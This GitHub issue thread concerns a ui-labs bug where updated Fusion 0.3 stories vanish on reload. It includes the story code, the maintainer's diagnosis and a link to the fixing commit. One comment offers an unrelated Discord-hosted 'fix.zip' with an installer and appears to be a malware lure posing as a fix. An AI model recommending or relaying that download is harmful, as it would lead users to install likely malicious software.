### ISSUE TITLE
Updated story gets removed when using fusion 0.3

### ISSUE THREAD

**Issue by AridAjd** [PepeElToro41/ui-labs#40]
If you use fusion 0.3 and change your source (I'm using VSCode), then the previous UI will get removed (as `doCleanup` was most probably called). However, the new updated UI will not show up.

Repro:

https://github.com/user-attachments/assets/be63d8cd-23c4-43b5-9498-1a4b9e639691

Story code:
```luau
-- SERVICES >
local ReplicatedStorage = game:GetService("ReplicatedStorage")

-- FOLDERS >
local Packages = ReplicatedStorage.Packages

-- DEPENDENCIES >
local Fusion = require(Packages.fusion)
local MenuScreen = require(script.Parent)

-- RETURNING >
return {
	fusion = Fusion,
	story = function(props)
		(props.scope :: Fusion.Scope<typeof(Fusion)>):Hydrate(props.target) {
			[Fusion.Children] = MenuScreen(props.scope),
		}
	end,
}
```

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by PepeElToro41** [comment]
That's an interesting way of mounting. I realized that the story unmounting happens after remounting, which is definitively not ideal.

However you really dont want fusion to control the target frame in any way as this is already being controlled by ui labs. So I'd recommend to change the parent of MenuScreen instead, or create a subframe inside

Seems like hydrate will clear the children when calling `doCleanup`, but because this happens after it mounts it also cleans up the new story. I'll change it so it unmounts before attemping to mount again, as I see this potentially causing problems later

**Comment by PepeElToro41** [comment]
Yeah. I'd still avoid doing `Hydrate` in the target though. I also see that potentially causing issues too

**Comment by PepeElToro41** [comment]
Fixed Here: https://github.com/PepeElToro41/ui-labs/commit/040b0ad8cf2e5cb21faeae9d3e8ae103ddbd0ace
